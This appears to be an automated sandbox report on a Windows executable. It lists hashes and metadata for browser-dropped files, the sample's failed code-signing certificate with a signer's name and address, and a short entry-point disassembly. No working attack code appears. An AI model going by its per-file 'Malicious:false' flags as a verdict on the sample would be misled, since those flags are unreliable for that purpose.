                                                                                                                                                                                                                                                                SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 11:46:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2677
                                                                                                                                                                                                                                                                Entropy (8bit):3.9789795438473092
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:83w0dyTeBUGHiZidAKZdA1oehwiZUklqehLy+3:8g5THaky
                                                                                                                                                                                                                                                                MD5:5190D01ECCE82AD9F32F591A46A204F1
                                                                                                                                                                                                                                                                SHA1:96AA4DA6EBFC5F28BB9629608EF8AD31BE06681E
                                                                                                                                                                                                                                                                SHA-256:F6FAA176E971DB760A7D8FC8A2A119D9D70D61951D97C8CB10255CDFCAF36AA1
                                                                                                                                                                                                                                                                SHA-512:5CEB6D08A215986DD9D221E1618387039A55C77E2000CC5528CFD13606DB09CBB4ED60FF1FB832B6D64DB1016E7099C0865FAC7A7195D8A812858F2F37FF817B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 11:46:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2679
                                                                                                                                                                                                                                                                Entropy (8bit):3.996506389759498
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:8mw0dyTeBUGHiZidAKZdA1leh/iZUkAQkqehUy+2:835THw9QBy
                                                                                                                                                                                                                                                                MD5:18DCF5D75A2D3E429FE2F37C9A6E1345
                                                                                                                                                                                                                                                                SHA1:4DA4CFBF2AE1E469AE197210CC05F198F5262C1E
                                                                                                                                                                                                                                                                SHA-256:ACE9C8C9142C29852925C65351A206D8D69DEEE8B97FCA3B4F2DF9C700004CB8
                                                                                                                                                                                                                                                                SHA-512:E9CE24BD6DE7875CBA42DAFA3212FA0211C1DA102E4396A04FB11C90465010053B5783F7DCAF1AF28EE2087167F29865E57D5CA7196ED113F63A0354706B2F47
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2693
                                                                                                                                                                                                                                                                Entropy (8bit):4.005394788411606
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:8Ww0dyTeBUbHiZidAKZdA14t5eh7sFiZUkmgqeh7sSy+BX:8H5Tu4noy
                                                                                                                                                                                                                                                                MD5:BA21D6D5F8376A93D562F0AF311626E1
                                                                                                                                                                                                                                                                SHA1:B924235282C15EC7F4C78B5685B5190E71D795C7
                                                                                                                                                                                                                                                                SHA-256:31DDBB105E6F3774F980234B36B0BF800324F6D3171ED40AEFF844AF999A0AA1
                                                                                                                                                                                                                                                                SHA-512:F8F08512D4214F1FF0409951CC8EC652A00B56DAC5D73AD7BDDE44BD37B509AD50CE22466E5FE37962A62C61164282B23E73E731E8EB0CA8C5E23EE01A6FD77F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 11:46:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2681
                                                                                                                                                                                                                                                                Entropy (8bit):3.9943145182017887
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:85w0dyTeBUGHiZidAKZdA16ehDiZUkwqehAy+R:8+5THrKy
                                                                                                                                                                                                                                                                MD5:D5A8F8905C63F77D0E037E019DD50345
                                                                                                                                                                                                                                                                SHA1:9EEB0F75A099305DEB3D555285384B41BA2D8823
                                                                                                                                                                                                                                                                SHA-256:F26F3941B46011D35DB9B2BD4C085DA966A4E97CA76FC97368A55B8DEF37004D
                                                                                                                                                                                                                                                                SHA-512:2C08C3024845BE6394B8F106D6571017E59531001975FA237DDB0558814E54045190DFEC50B05F9E43268AA810D770725AA07731A744513D0E5F332651510324
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 11:46:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2681
                                                                                                                                                                                                                                                                Entropy (8bit):3.9838712419080973
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:81w0dyTeBUGHiZidAKZdA1UehBiZUk1W1qehWy+C:8i5THL92y
                                                                                                                                                                                                                                                                MD5:E92F5F049432FAB91AF81F1B968C3DBF
                                                                                                                                                                                                                                                                SHA1:BC7D1D1A7FD0C39DFE1D366F07700D4B65067C54
                                                                                                                                                                                                                                                                SHA-256:CF8D122E5B14462C12536ACA409D3485049843587AA1C1775C01EF20FAEC66D6
                                                                                                                                                                                                                                                                SHA-512:DF8C327EBBABC6A4925B2D37AA1B9B76EBDA3459BA59250FD0BC2B8D12D6AE555C81C551D0DDCB801791BC38F2C8C466B3A149237ED4B6822EB314691587A8E6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 16 11:46:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2683
                                                                                                                                                                                                                                                                Entropy (8bit):3.9918117216802282
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:86w0dyTeBUGHiZidAKZdA1duTrehOuTbbiZUk5OjqehOuTboy+yT+:8D5THETYTbxWOvTboy7T
                                                                                                                                                                                                                                                                MD5:83B97733F3FD79F4054163E695152DF5
                                                                                                                                                                                                                                                                SHA1:F8400BC003587BF97C6FCCC29F062B1C052BD0A2
                                                                                                                                                                                                                                                                SHA-256:D9617289802FA77EA703FFA5008B8EB6269D220C41A293788BC27787CBA98D8D
                                                                                                                                                                                                                                                                SHA-512:411732C8E9AE22ABD0829587154A313426E377D9B7BF9D72D315429A1448EF679955D6E85BA45B38EE68EA7F78659681EAB3C3694C4533E9A3CAA663DBA19545
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5802)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5807
                                                                                                                                                                                                                                                                Entropy (8bit):5.808900662188082
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:USp6liWp/JK/33jEsvR0xXYFd66666COR1RP817+vZiyUIFPx5CH7Jx00WPffffy:xKPp/JK3zLWYFd66666C01l817+hiyUP
                                                                                                                                                                                                                                                                MD5:F93341F0D09BCE9B276EED1492676B42
                                                                                                                                                                                                                                                                SHA1:DEE3F39C35DE6A2E4A922D0FA5C242FB154E4573
                                                                                                                                                                                                                                                                SHA-256:79D4AB4F19A0DBC4768E72681FCD4803A602EABD145230973B547E36F78CE945
                                                                                                                                                                                                                                                                SHA-512:CC851154A92DFC0A8B903353BD86F8DD723D74F9722B05FB82EE0C92EBE50CD9D46A649B47E0BE1EC9F018738369908736796B662E5F234963DD8D7D161DC2A8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                                                Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):132999
                                                                                                                                                                                                                                                                Entropy (8bit):5.435543893910781
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:flktv3zg+newH5FsYZGFsxIojLe13y2i6o:fAvn/H/MFsxIojY3y8o
                                                                                                                                                                                                                                                                MD5:C6448B24D32CF4F3DF38D5AAB120C703
                                                                                                                                                                                                                                                                SHA1:8F09722B17857C0595199E963052D2CF3D0C2FB6
                                                                                                                                                                                                                                                                SHA-256:16C3ABB5FDC6A15706ED3E0FCFF429B3128A54A0F236ED61A539EC166AC1984F
                                                                                                                                                                                                                                                                SHA-512:7AA3D6A031D0150E495AF7B0BCBC035EF1D46BDA87DE3DF3E82DABA48CBF61668EADC706D69FE9AAB7145BAF66B622337A429A02FC85B319C5BBB17EC3588EFA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Entropy (8bit):7.966288323697462
                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                File name:nB52P46OJD.exe
                                                                                                                                                                                                                                                                File size:1'357'367 bytes
                                                                                                                                                                                                                                                                MD5:c6e90b3a98ecb4ab74a9aaf8155d1bc0
                                                                                                                                                                                                                                                                SHA1:0a29a790ab82dda61c5622586fbdbf46223b2989
                                                                                                                                                                                                                                                                SHA256:08bae1bb8a881ff6a6a25f988d73def21b6d65d262960bc4706534f479b85b62
                                                                                                                                                                                                                                                                SHA512:a0dcf48abd2df0b1d9afd33a49027047b53830f52bb0c16745fc953eaa9d38f15720496cbcf62eb17fcfa5a955ceadc16abfe8817350b6f528312e3429daa5aa
                                                                                                                                                                                                                                                                SSDEEP:24576:C3+N6VbU/lx01RMCHCeMyipDIwATowO1vgc9HQHfw9hSTVbB4:v6bUn0XM4M3DIH8wGPMIcbW
                                                                                                                                                                                                                                                                TLSH:C7553386FEF8C2F3C6A12A3087B6455496F5FA15252485066F34BC2D36E5E824F0ED3B
                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                                Icon Hash:c08ab2b2b2de7eb6
                                                                                                                                                                                                                                                                Entrypoint:0x4038af
                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                                                                                Signature Issuer:CN=COMODO Code Signing CA 2, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                Error Number:-2146869232
                                                                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                                                                • 08/01/2013 19:00:00 09/01/2016 18:59:59
                                                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                                                • CN=Kirill Chermenin, O=Kirill Chermenin, STREET=70 Let Oktyabrya 17-50, L=Krasnodar, S=Krasnodarsky kray, PostalCode=350089, C=RU
                                                                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                                                                Thumbprint MD5:F4FE6AA0803BA4D986A0EFCC6CA0CA47
                                                                                                                                                                                                                                                                Thumbprint SHA-1:73F818C5F12C8C71136A5E6B45B29398888A48C2
                                                                                                                                                                                                                                                                Thumbprint SHA-256:A1E23231AEC7BFA0BFDDF468D8BE5DEA5463456EC1400E11B2039D01DAA4A1DE
                                                                                                                                                                                                                                                                Serial:00BADFCFEBF80484E1CF8E39A8B7F16D8A
                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                sub esp, 000002D4h
                                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                                                push 00000020h
                                                                                                                                                                                                                                                                xor ebp, ebp
                                                                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                                                                mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                call dword ptr [00409030h]
                                                                                                                                                                                                                                                                push 00008001h
                                                                                                                                                                                                                                                                call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                push 00000008h
                                                                                                                                                                                                                                                                mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                call 00007FE780B5B20Bh
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                push 000002B4h
                                                                                                                                                                                                                                                                mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                push 0040A264h
                                                                                                                                                                                                                                                                call dword ptr [00409184h]
                                                                                                                                                                                                                                                                push 0040A24Ch
                                                                                                                                                                                                                                                                push 00476AA0h
                                                                                                                                                                                                                                                                call 00007FE780B5AEEDh
                                                                                                                                                                                                                                                                call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                                                call 00007FE780B5AEDBh
                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                call dword ptr [00409134h]
                                                                                                                                                                                                                                                                cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                mov eax, edi
                                                                                                                                                                                                                                                                jne 00007FE780B587DAh
                                                                                                                                                                                                                                                                push 00000022h
                                                                                                                                                                                                                                                                pop esi
